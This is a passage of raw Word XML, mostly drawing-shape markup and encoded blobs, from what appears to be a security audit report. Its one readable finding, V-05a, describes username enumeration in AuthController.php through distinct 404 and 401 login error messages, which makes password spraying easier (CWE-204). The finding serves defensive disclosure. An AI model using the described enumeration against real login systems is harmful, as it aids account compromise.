                                  <a:pt x="2431505" y="133344"/>
                                  <a:pt x="2428875" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128693"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>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39793C4" id="Group 26247" o:spid="_x0000_s1026" style="position:absolute;margin-left:31.45pt;margin-top:-1.7pt;width:219pt;height:24pt;z-index:-251445248" coordsize="27813,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&#10;">
                <v:shape id="Shape 1227" o:spid="_x0000_s1027" style="position:absolute;left:14954;width:12859;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="12858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WNxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X/A/LCL01G3OobeoqIoja4sFH6XWaHfMwOxuyq0n7612h0Nt8fM+ZzHpTiyu1rrSsYBTFIIgz&#10;q0vOFRwPy6cXEM4ja6wtk4IfcjCbDh4mmGrb8Y6ue5+LEMIuRQWF900qpcsKMugi2xAH7mRbgz7A&#10;Npe6xS6Em1omcfwsDZYcGgpsaFFQdt5fjILv30X3gav3avP1mu8+k7oaz7eVUo/Dfv4GwlPv/8V/&#10;7rUO85NkDPdvwglyegMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAWaXWNxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l1276350,v2630,,4875,930,6735,2784c1284945,4645,1285875,6896,1285875,9525r,114300c1285875,126454,1284945,128693,1283085,130553v-1860,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1285875,133350"/>
                </v:shape>
                <v:shape id="Shape 1233" o:spid="_x0000_s1028" style="position:absolute;top:1714;width:2286;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2286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B5wwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/bisIw&#10;EH1f8B/CLOzbmlpBtBpFBHVFVrD6AUMz2xabSWmirX69EYR9m8O5zmzRmUrcqHGlZQWDfgSCOLO6&#10;5FzB+bT+HoNwHlljZZkU3MnBYt77mGGibctHuqU+FyGEXYIKCu/rREqXFWTQ9W1NHLg/2xj0ATa5&#10;1A22IdxUMo6ikTRYcmgosKZVQdklvRoFk/0u3bX15RQ/DtuxOy/95j74Verrs1tOQXjq/L/47f7R&#10;YX48HMLrm3CCnD8BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA8dvgecMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l219075,v2630,,4875,930,6735,2784c227670,4645,228600,6890,228600,9525r,114300c228600,126454,227670,128693,225810,130553v-1860,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6890,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,228600,133350"/>
                </v:shape>
                <v:shape id="Shape 1236" o:spid="_x0000_s1029" style="position:absolute;left:2667;top:1714;width:24384;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="24384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0uTwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/fa8Iw&#10;EH4f+D+EG+xNU62UrRpFFNkYONDp+9GcaVhzKU2s3X+/DAZ7u4/v5y3Xg2tET12wnhVMJxkI4spr&#10;y0bB+XM/fgYRIrLGxjMp+KYA69XoYYml9nc+Un+KRqQQDiUqqGNsSylDVZPDMPEtceKuvnMYE+yM&#10;1B3eU7hr5CzLCunQcmqosaVtTdXX6eYUcF98HHZmbl/mxr6H12mOx0uu1NPjsFmAiDTEf/Gf+02n&#10;+bO8gN9v0gly9QMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDfa0uTwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l2428875,v2630,,4875,930,6735,2784c2437470,4645,2438400,6890,2438400,9525r,114300c2438400,126454,2437470,128693,2435610,130553v-1860,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6890,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,243840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2256" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FA913EF" wp14:editId="546E9BB4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3685281</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-21594</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2562225" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26248" name="Group 26248"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2562225" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2562225" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1230" name="Shape 1230"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2562225" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2562225" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2552700" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2555329" y="0"/>
                                  <a:pt x="2557575" y="930"/>
                                  <a:pt x="2559435" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2561294" y="4645"/>
                                  <a:pt x="2562224" y="6896"/>
                                  <a:pt x="2562225" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="2562225" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2562224" y="126454"/>
                                  <a:pt x="2561294" y="128693"/>
                                  <a:pt x="2559435" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2557575" y="132414"/>
                                  <a:pt x="2555329" y="133344"/>
                                  <a:pt x="2552700"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0AA1E04" id="Group 26248" o:spid="_x0000_s1026" style="position:absolute;margin-left:290.2pt;margin-top:-1.7pt;width:201.75pt;height:10.5pt;z-index:-251444224" coordsize="25622,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&#10;">
                <v:shape id="Shape 1230" o:spid="_x0000_s1027" style="position:absolute;width:25622;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="25622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exQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NbsJA&#10;DITvlXiHlZF6KxuoiiCwIISExKWH8ne2siYJZL0huyTh7etDpd5szXjm83Ldu0q11ITSs4HxKAFF&#10;nHlbcm7gdNx9zECFiGyx8kwGXhRgvRq8LTG1vuMfag8xVxLCIUUDRYx1qnXICnIYRr4mFu3qG4dR&#10;1ibXtsFOwl2lJ0ky1Q5LloYCa9oWlN0PT2fg5sYP7ir7Ovf3r+/Zvr1c56Uz5n3YbxagIvXx3/x3&#10;vbeCP/kUfvlGRtCrXwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA/hOZexQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l2552700,v2629,,4875,930,6735,2784c2561294,4645,2562224,6896,2562225,9525r,114300c2562224,126454,2561294,128693,2559435,130553v-1860,1861,-4106,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2562225,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>V-05a</w:t>
      </w:r>
      <w:r>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Username enumeration.</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AuthController.php:33</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> returned </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">404 "The provided username does not exist." </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">versus </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:40</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401 "The provided password is incorrect."</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker could confirm which usernames exist cheaply, without guessing a password and only then spray. Usernames here are predictable staff names, so that first step was close to free. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-204.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF2C20" w14:textId="4BC8F75C" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA733A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251873280" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3258271A" wp14:editId="7AE0DAB2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1599307</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-14992</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2609850" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26249" name="Group 26249"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2609850" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2609850" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1243" name="Shape 1243"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2609850" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2609850" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2600325" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2602955" y="0"/>
                                  <a:pt x="2605200" y="930"/>
                                  <a:pt x="2607060" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2608920" y="4645"/>
                                  <a:pt x="2609850" y="6890"/>
                                  <a:pt x="2609850" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="2609850" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2609850" y="126454"/>
                                  <a:pt x="2608920" y="128693"/>
                                  <a:pt x="2607060" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2605200" y="132414"/>
                                  <a:pt x="2602955" y="133344"/>
                                  <a:pt x="2600325" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128693"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>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9B8316C" id="Group 26249" o:spid="_x0000_s1026" style="position:absolute;margin-left:125.95pt;margin-top:-1.2pt;width:205.5pt;height:10.5pt;z-index:-251443200" coordsize="26098,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wbiTgMAALIJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N9pseUHsAG2WS9EG&#10;TfoBNE1ZAihRIGnL7td3OBJpWUqDJsnBoTjbmzfDIa9vjiX3DkyqQlQrP7oKfY9VVGyLarfyfz/f&#10;f5n7ntKk2hIuKrbyT0z5N+vPn66beslikQu+ZdIDJ5VaNvXKz7Wul0GgaM5Koq5EzSoQZkKWRMOn&#10;3AVbSRrwXvIgDsM0aITc1lJQphTs3rZCf43+s4xR/TPLFNMeX/mATeOvxN+N+Q3W12S5k6TOC9rB&#10;IO9AUZKigqDO1S3RxNvLYuSqLKgUSmT6iooyEFlWUIY5QDZROMjmQYp9jbnsls2udjQBtQOe3u2W&#10;/jg8yPqpfpTARFPvgAv8MrkcM1ma/4DSOyJlJ0cZO2qPwmachov5FJilIIuSJIE1ckpzIH5kRvO7&#10;1w0DGza4ANPU0B7qzID6GANPOakZEquWwMCj9IotwI8nie9VpIQ+RQ0Pd5AY1HM0qaUCxj7IkUuV&#10;LOle6QcmkG1y+K5025ZbuyK5XdFjZZcSmvvVtq6JNnYGpll6Ta9cuauWEZfiwJ4FKmpTs8U0nvqe&#10;rTYAPSvwqq8I5Q+Tga7VoPtNQb+yPwP9eDHt+QZoGBEcTeE8Y9BF0vWQE83CtBXFs/nE9BdAunR/&#10;+eUM54u4NZykk2nbmE7W9i0kmc4Xw4BOhky8FNBmOXYXxckcKGmNrNo/8Lk4UQwAMbUeIw59FM/T&#10;RTLA70iJknA6Ren/0uKojpJ4Eg3DugqZ8zwZSl29z6d9FNZm3ZLjuunCwuq8xAxUpO2RMYJJaqYN&#10;DpsR9BnUsRW9iRDTb2g2YtnuD2tj93uFvkzDJtcS0Kr3WsmKL436ysOetBhHfWxzftPJcCQOjprj&#10;/eI8uPrh7qjYlAvF2m43YwYPpxs9qH0ebrwyUwj4oAQu+4wTjbdmWWh4BfCiNEN4FsIcsKcHvJnZ&#10;345bXOkTZ2ZS8eoXy2Bu481kNpTcbb5x6R2IuevxD50TXuek2+38dqoIFf0Y+6zg3LmM0PTC5d3t&#10;fXyfdh46ZWPH8JnhLMPWknZo2rcG3NiQtH1xACnOCCOLSjv7Ct5JGKSXrVluxPaEtzQSApchUoMP&#10;A8yje8SYl0f/G7XOT631XwAAAP//AwBQSwMEFAAGAAgAAAAhAH0mWNPgAAAACQEAAA8AAABkcnMv&#10;ZG93bnJldi54bWxMj8FKw0AQhu+C77CM4K3dJNrQxmxKKeqpCLaC9DbNTpPQ7G7IbpP07R1PepyZ&#10;j3++P19PphUD9b5xVkE8j0CQLZ1ubKXg6/A2W4LwAa3G1llScCMP6+L+LsdMu9F+0rAPleAQ6zNU&#10;UIfQZVL6siaDfu46snw7u95g4LGvpO5x5HDTyiSKUmmwsfyhxo62NZWX/dUoeB9x3DzFr8Puct7e&#10;jofFx/cuJqUeH6bNC4hAU/iD4Vef1aFgp5O7Wu1FqyBZxCtGFcySZxAMpGnCixOTyxRkkcv/DYof&#10;AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAA&#10;LwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAA9rBuJOAwAAsgkAAA4AAAAAAAAAAAAAAAAA&#10;LgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAH0mWNPgAAAACQEAAA8AAAAAAAAAAAAA&#10;AAAAqAUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAA